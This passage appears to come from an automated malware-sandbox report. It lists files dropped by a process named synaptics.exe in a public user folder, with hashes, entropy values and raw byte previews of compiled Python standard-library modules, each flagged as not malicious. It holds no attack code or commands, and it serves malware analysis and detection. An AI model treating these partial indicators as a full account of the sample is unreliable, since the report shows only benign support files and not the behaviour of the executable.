                                                                                                                                                                                                                                  Preview:o........'-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....-C:\Users\Public\M20EKMMEH2\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dictc
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6368
                                                                                                                                                                                                                                  Entropy (8bit):5.77679866747433
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:u7jrG4iQ2AaI2Ym9gqQBI1I1dadE1ff7l17mwvYhaSEZ84C:uM9rIdNfT6E8
                                                                                                                                                                                                                                  MD5:4E0881E0E0DD14C044C0A32C840CE50A
                                                                                                                                                                                                                                  SHA1:E5B867F969E32844916D1A5F77A699EB8B582631
                                                                                                                                                                                                                                  SHA-256:81A201BDC77C1BD5A9673DE9B7044BF9E64D829FA38C0152D93521BD99AC5864
                                                                                                                                                                                                                                  SHA-512:F819DEAD9DD493BDAE32A2FAB1F9D05912246B20F88F12DBC5A8432B584FE3398ACA8ADEB48875A2AC790271DC27EC04DCE7B41A52AAC10585D019F1B3CB80CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21766
                                                                                                                                                                                                                                  Entropy (8bit):5.596092412819896
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Cin5DWum7nnQBcNr5ZjTL2xs66HeYHmDcgR6OW7tAu9oD3P4At2XmaUI30TAIJzZ:Ciz5K2x6+Ym7R6OW7tX+AAt2X0bJp8Ns
                                                                                                                                                                                                                                  MD5:2A84808B63BF5F21F284201BB2F806DD
                                                                                                                                                                                                                                  SHA1:C37B4A00601CDD2F931F55F1806435FDE81A8F3C
                                                                                                                                                                                                                                  SHA-256:EA843DC1DF9FBF9F56D9A62F878995A3CE20DE9344A10BCFA52DB4D8469D5873
                                                                                                                                                                                                                                  SHA-512:8C9F1F4ACA17B7BD9E6903361956D342F3AA4D759C39039855E1569A7D720A817337A8C16A78B17B9F6A150DEEBF19ECC1AB958F5A2100607D3506CA791B4A21
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....+C:\Users\Public\M20EKMMEH2\lib\sre_parse.pyr....G...s........r....c.............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44831
                                                                                                                                                                                                                                  Entropy (8bit):5.570458815080798
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:M653tgqSiJVJd4LRmQPAMN4FM81OVgTkChwR9FP:M63tBFJDy9T9NCUM1CRbP
                                                                                                                                                                                                                                  MD5:B4D4ADFA1D78BF03060E1CFEB1E8CE46
                                                                                                                                                                                                                                  SHA1:CE554B5911719FE9F204EC40F778E1ED8F712B45
                                                                                                                                                                                                                                  SHA-256:6E6FC7F9F2319A03172C8774E04C2FB9ECD187CDC25DB34D0463E6F7E6CEFAA6
                                                                                                                                                                                                                                  SHA-512:3068ADE12E2C038FF211BC127D00F13163B5FEEC2244046E69459193CD4CDD536160BFF16783E7E64E5AF85ED8455BAA0EA90922A0479260A8053CDE34DA442B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4284
                                                                                                                                                                                                                                  Entropy (8bit):5.541156423250741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Vn/f+60wN3EXHm/aowjk0wBoCAEFXOrW6QBeABPl:VeRy3EmBwjk0w+CFXefQBT
                                                                                                                                                                                                                                  MD5:8177C06C7A1B52687834FDAFA67F4A54
                                                                                                                                                                                                                                  SHA1:B06B642DAC3F45448B603549BC7C6B7FA2CE4895
                                                                                                                                                                                                                                  SHA-256:944E308E1CB4D124EB42051081C68621E6AF24CBDD4CA74A66F096C91A205B99
                                                                                                                                                                                                                                  SHA-512:912D55D30FC6B3C78144D9DF3DA8399723F9E2C6C9D13C276AB585E50AF76F6B2276340DA3AA6DC58DFD5943C29E9443063900FAEF92B2EF08258E99FD231E56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....&C:\Users\Public\M20EKMMEH2\lib\stat.py..S_IMODE..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7113
                                                                                                                                                                                                                                  Entropy (8bit):5.393111734773908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:HLetNTT8nclJcsGpTeWD3EDNmO2vja68/2s4li6lu:SbTT8nmvGpT/O2vja68/x4limu
                                                                                                                                                                                                                                  MD5:22C9D90E0DC4528B01B2BF716F2CB19F
                                                                                                                                                                                                                                  SHA1:730A6D9AA18CE7A5C151B289FD966CC417DC11BD
                                                                                                                                                                                                                                  SHA-256:2EEBF9ED225656F9EF63E64E8622370CF99B2D890A84C24D028A7B514385D3D4
                                                                                                                                                                                                                                  SHA-512:463C319C0518DFFEDCC75303431134C2625281F8A01D97E0F1542AB85228F5089AB530320AC9C99E80F09A1EFB53E1824A9F86C6D81A186D816FB2A6F0FDEC4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17086
                                                                                                                                                                                                                                  Entropy (8bit):5.693315122196875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rORubSi/2orlLSqOf9dzA3gfqtv+ScNDMepN9WDnuxb3rOyb5:rOkbSi+orF29JlqtvtcNoepN9Wzra
                                                                                                                                                                                                                                  MD5:C9381FAC7DF1CC8218E38947E8270B94
                                                                                                                                                                                                                                  SHA1:64BFA8BC73593F2E07C456F19615EB8FE67E9424
                                                                                                                                                                                                                                  SHA-256:B8807DBE0825A360B109F86D3DF13F7118EA904C5E91F195ABCACA205C1FF92D
                                                                                                                                                                                                                                  SHA-512:29F29ED1BD35B978731812A8F2F1C3946C6BD11A8779C2AF127F6C98324FE90C5CBEBF222A25DAABEF93734FFE9674004A85A2F93A269DABA56295F0A1C9B151
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                                                  Entropy (8bit):5.118440227874491
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/XextfvXhzYXcCuYKvg6FraMaVkoopngmIEmuaHK2/Zkn:Cuxt35YXcaKvjFrDaVkoeXz2/Zkn
                                                                                                                                                                                                                                  MD5:5642FA92C34BC32FAEB2D46DCDB6687F
                                                                                                                                                                                                                                  SHA1:2F5B3365108F0C607AB1A6B4E8DC8DF35539E739
                                                                                                                                                                                                                                  SHA-256:C161997C31F04C4C524EA79DDFEDEFB8C59A45D7E5AFC20F76F4850E78A5CCB1
                                                                                                                                                                                                                                  SHA-512:20F80C906A7B21B90E8E1F855FEE8B033816C979071E570981FF5FE43E4A822D3ADD598EDD303DB639C9CFFA7790669A711ED3774248C8BF70498B0E3523090A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....(C:\Users\Public\M20EKMMEH2\lib\struct.py..<module>....s............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24075
                                                                                                                                                                                                                                  Entropy (8bit):5.283906014901038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8GeOsQ/N1bmiY+HWkXkONXPVlMyNwfUC9Nrz/Stjtb7hLBx3/Tds5Vp:LeR81bminY0XPVmyNwM8NPqJ7Zb7ds5T
                                                                                                                                                                                                                                  MD5:8978FEA7CF31AD101ADE1974D3D4392A
                                                                                                                                                                                                                                  SHA1:51155FE2E93BF05FCA4778C2158266EFFA7E0C88
                                                                                                                                                                                                                                  SHA-256:CBBA632D53EA7D1D5BFDC2609457ABE65CC9D02910B7101C856C841A1515AC3A
                                                                                                                                                                                                                                  SHA-512:DF1B2FB6237AACBFBF54E73277DDCE6DAA4AE7A297DFDABB88A504488928C894510EE8D2EED3547761864AA98CFB0BBF4F60D9F41D28D3BE6621414639E0DDFB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13823
                                                                                                                                                                                                                                  Entropy (8bit):5.342399706913279
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:CB47ddTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:CB47dwF/5JNG5MkkBQ
                                                                                                                                                                                                                                  MD5:5AD73B0658806DD412B768464FD812D8
                                                                                                                                                                                                                                  SHA1:51E78432AF8A6B7A1007E764991DCEED12C533E5
                                                                                                                                                                                                                                  SHA-256:D35364467DF50F39462D6571FE7BF9762D4A88065E7EB975F70460EDBA113E81
                                                                                                                                                                                                                                  SHA-512:29961581719056D6EF3DB686EAA98546963F687333D67039239FED00F1CA835949EEE02BB2B61332EA61BF14867AB6C6875D81452E5782D95204BADB68F252A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44980
                                                                                                                                                                                                                                  Entropy (8bit):5.173211281018087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:d1h/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO89x+6Lc/QpZ2efn0:dX/8Zf2lbPs/v612aOJ/46PeaBATiI/z
                                                                                                                                                                                                                                  MD5:27DC22E264B43B6AF355F26AF3191C8E
                                                                                                                                                                                                                                  SHA1:697FC19D4B22C91D9CA9D0D814E7CCFAAA390D49
                                                                                                                                                                                                                                  SHA-256:9BABBF9F352E1693990B475C2F5218643AB84E8A00C73B9D29963E5138DBFAF5
                                                                                                                                                                                                                                  SHA-512:3007D681AE11D0800DBF266347425925FCCC3AE7265E5E206CBBD795A4B85213D0712B57F70B42D95E9AF3AB7C9BCBCF164D138574A32FD1026F1C6EE2CE0969
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2749
                                                                                                                                                                                                                                  Entropy (8bit):5.773002082742788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:6HWS58lFEOqIlPBJR41XQBzH3ch9C7Q7WnvKQvVgkGQLU:6HWSOFEOb5nJBb3ch9T6qKLU
                                                                                                                                                                                                                                  MD5:9CD2E0E5622F7303F6E687DC03A3F056
                                                                                                                                                                                                                                  SHA1:215474D2F57895D8A26D1F628BA402917001BFE7
                                                                                                                                                                                                                                  SHA-256:E4E18A9921CB13FEC851DB39B42D687BA15D1FFA713B31094306057B2388A38A
                                                                                                                                                                                                                                  SHA-512:41054D5867335820B4E9A48B61DFBB609B2BCDD1015DEA6FF93368D47B840C8EE7D76673A4B658C6122C708E779DDD1465B3D0340B7E1F603725E871B183F736
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17205
                                                                                                                                                                                                                                  Entropy (8bit):5.7789575475919275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:pSAswuifIbAPaiOkoc/w3CJg+YRn9JMHfHE7BFli:pmiKAPajkoc/wyJg+Y/s87BFli
                                                                                                                                                                                                                                  MD5:2578CF6AC992A74BC49C7C6B6475DC7C
                                                                                                                                                                                                                                  SHA1:C758ECC6BED53194288A4C2F4969551F03B59B5B
                                                                                                                                                                                                                                  SHA-256:0EA9185BC1C6126EAB1F3A9EB219212D1CD9476A6A7E78D396457AFF8AC87ADD
                                                                                                                                                                                                                                  SHA-512:9580A55796E25981F21128EA84BB785D94FF4166DF70F5942140090D263606E1FAEDF26E95E75E8CC318CFE4D9F0B9B6DF48D0F65183DB7C753C869D51AEBB60
                                                                                                                                                                                                                                  Malicious:false
